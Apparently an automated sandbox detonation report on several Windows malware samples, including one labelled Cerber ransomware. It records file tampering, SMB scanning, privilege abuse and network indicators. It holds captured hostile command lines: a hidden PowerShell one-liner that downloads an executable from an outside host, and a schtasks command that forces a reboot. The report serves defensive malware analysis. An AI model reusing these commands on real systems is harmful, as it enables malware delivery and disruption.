| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Web Server Extensions\16\BIN\1033\FPEXT.MSG | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\amd64\jvm.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\1494870C-9912-C184-4CC9-B401-A53F4D8DE290.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\AdobeID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\bridge\AccessBridgeCalls.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Oracle\Java\java.settings.cfg | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.PPT | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.XLS | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jdwpTransport.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\jni.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\classfile_constants.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Program Files\Java\jdk-1.8\include\win32\jni_md.h | C:\Windows\SysWOW64\rundll32.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\dllhost.dat | C:\Windows\SysWOW64\rundll32.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeTcbPrivilege | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\8136.tmp | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745_98STJd8lju.dll,#1
C:\Windows\SysWOW64\cmd.exe
/c schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
C:\Users\Admin\AppData\Local\Temp\8136.tmp
"C:\Users\Admin\AppData\Local\Temp\8136.tmp" \\.\pipe\{4D5A61E3-78D6-4AC0-943E-7442F441CAB3}
C:\Windows\SysWOW64\schtasks.exe
schtasks /Create /SC once /TN "" /TR "C:\Windows\system32\shutdown.exe /r /f" /ST 16:27
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| N/A | 10.127.0.0:445 | tcp | |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 52.185.211.133:445 | settings-win.data.microsoft.com | tcp |
| N/A | 10.127.0.1:445 | tcp | |
| DE | 49.12.169.208:445 | tcp | |
| DE | 49.12.169.208:139 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| US | 52.185.211.133:139 | settings-win.data.microsoft.com | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| N/A | 10.127.0.0:139 | tcp | |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| N/A | 10.127.0.1:445 | tcp | |
| N/A | 10.127.0.1:139 | tcp | |
| N/A | 10.127.0.2:445 | tcp | |
| N/A | 10.127.0.2:139 | tcp | |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| N/A | 10.127.0.3:445 | tcp | |
| N/A | 10.127.0.3:139 | tcp | |
| N/A | 10.127.0.4:445 | tcp | |
| N/A | 10.127.0.4:139 | tcp | |
| N/A | 10.127.0.5:445 | tcp | |
| N/A | 10.127.0.5:139 | tcp | |
| N/A | 10.127.0.6:445 | tcp | |
| N/A | 10.127.0.6:139 | tcp | |
| N/A | 10.127.0.7:445 | tcp | |
| N/A | 10.127.0.7:139 | tcp | |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| N/A | 10.127.0.8:445 | tcp | |
| US | 8.8.8.8:53 | 140.71.91.104.in-addr.arpa | udp |
| N/A | 10.127.0.8:139 | tcp | |
| N/A | 10.127.0.9:445 | tcp | |
| N/A | 10.127.0.9:139 | tcp | |
| N/A | 10.127.0.10:445 | tcp | |
| N/A | 10.127.0.10:139 | tcp | |
| N/A | 10.127.0.11:445 | tcp | |
| N/A | 10.127.0.11:139 | tcp | |
| N/A | 10.127.0.12:445 | tcp | |
| N/A | 10.127.0.12:139 | tcp | |
| N/A | 10.127.0.13:445 | tcp | |
| N/A | 10.127.0.13:139 | tcp | |
| N/A | 10.127.0.14:445 | tcp | |
| N/A | 10.127.0.14:139 | tcp | |
| N/A | 10.127.0.15:445 | tcp | |
| N/A | 10.127.0.15:139 | tcp | |
| US | 8.8.8.8:53 | 83.210.23.2.in-addr.arpa | udp |
| N/A | 10.127.0.16:445 | tcp | |
| N/A | 10.127.0.16:139 | tcp | |
| N/A | 10.127.0.17:445 | tcp | |
| N/A | 10.127.0.17:139 | tcp | |
| N/A | 10.127.0.18:445 | tcp | |
| N/A | 10.127.0.18:139 | tcp | |
| N/A | 10.127.0.19:445 | tcp | |
| N/A | 10.127.0.19:139 | tcp | |
| N/A | 10.127.0.20:445 | tcp | |
| N/A | 10.127.0.20:139 | tcp | |
| N/A | 10.127.0.21:445 | tcp | |
| N/A | 10.127.0.21:139 | tcp | |
| N/A | 10.127.0.22:445 | tcp | |
| N/A | 10.127.0.22:139 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| N/A | 10.127.0.23:445 | tcp | |
| N/A | 10.127.0.23:139 | tcp | |
| N/A | 10.127.0.24:445 | tcp | |
| N/A | 10.127.0.24:139 | tcp | |
| N/A | 10.127.0.25:445 | tcp | |
| N/A | 10.127.0.25:139 | tcp | |
| N/A | 10.127.0.26:445 | tcp | |
| N/A | 10.127.0.26:139 | tcp | |
| N/A | 10.127.0.27:445 | tcp | |
| N/A | 10.127.0.27:139 | tcp | |
| N/A | 10.127.0.28:445 | tcp | |
| N/A | 10.127.0.28:139 | tcp | |
| N/A | 10.127.0.29:445 | tcp | |
| N/A | 10.127.0.29:139 | tcp | |
| N/A | 10.127.0.30:445 | tcp | |
| N/A | 10.127.0.30:139 | tcp | |
| N/A | 10.127.0.31:445 | tcp | |
| N/A | 10.127.0.31:139 | tcp | |
| N/A | 10.127.0.32:445 | tcp | |
| N/A | 10.127.0.32:139 | tcp | |
| N/A | 10.127.0.33:445 | tcp | |
| N/A | 10.127.0.33:139 | tcp | |
| N/A | 10.127.0.34:445 | tcp | |
| N/A | 10.127.0.34:139 | tcp | |
| N/A | 10.127.0.35:445 | tcp | |
| N/A | 10.127.0.35:139 | tcp | |
| N/A | 10.127.0.36:445 | tcp | |
| N/A | 10.127.0.36:139 | tcp | |
| N/A | 10.127.0.37:445 | tcp |
Files
memory/2632-0-0x00000000029F0000-0x0000000002A4E000-memory.dmp
memory/2632-8-0x00000000029F0000-0x0000000002A4E000-memory.dmp
memory/2632-11-0x00000000029F0000-0x0000000002A4E000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\8136.tmp
| MD5 | 7e37ab34ecdcc3e77e24522ddfd4852d |
| SHA1 | 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf |
| SHA256 | 02ef73bd2458627ed7b397ec26ee2de2e92c71a0e7588f78734761d8edbdcd9f |
| SHA512 | 1b037a2aa8bf951d2ffe2f724aa0b2fbb39c2173215806ba0327bda7b096301d887f9bb7db46f9e04584b16aa6b1aaeaf67f0ecf5f20eb02ceac27c8753ca587 |
memory/2632-9-0x00000000029F0000-0x0000000002A4E000-memory.dmp
memory/2632-22-0x00000000029F0000-0x0000000002A4E000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20241010-en
Max time kernel
15s
Max time network
19s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2476 wrote to memory of 2872 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2476 wrote to memory of 2872 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2476 wrote to memory of 2872 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
| PID 2476 wrote to memory of 2872 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\myguy.hta"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\30454.exe');
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | french-cooking.com | udp |
| FR | 54.36.91.62:80 | french-cooking.com | tcp |
Files
memory/2476-0-0x0000000002750000-0x0000000002770000-memory.dmp
memory/2476-2-0x0000000002750000-0x0000000002770000-memory.dmp
memory/2476-1-0x0000000002750000-0x0000000002770000-memory.dmp
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-26 15:24
Reported
2024-11-26 15:27
Platform
win7-20240903-en
Max time kernel
119s
Max time network
132s
Command Line
Signatures
Cerber
Cerber family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
Contacts a large (1098) amount of remote hosts
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\users\admin\appdata\roaming\microsoft\word\startup\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\SysWOW64\config\systemprofile\appdata\roaming\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4177215427-74451935-3209572229-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\tmp7899.bmp" | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\program files (x86)\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\steam | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\ | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\thunderbird | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\program files (x86)\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\desktop | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\microsoft sql server | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\word | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\office | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\onenote | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\documents | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\roaming\microsoft\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\microsoft\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\microsoft\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\roaming\outlook | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\powerpoint | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\the bat! | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\networkservice\appdata\local\bitcoin | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
| File opened for modification | \??\c:\windows\serviceprofiles\localservice\appdata\local\excel | C:\Users\Admin\AppData\Local\Temp\cerber.exe | N/A |
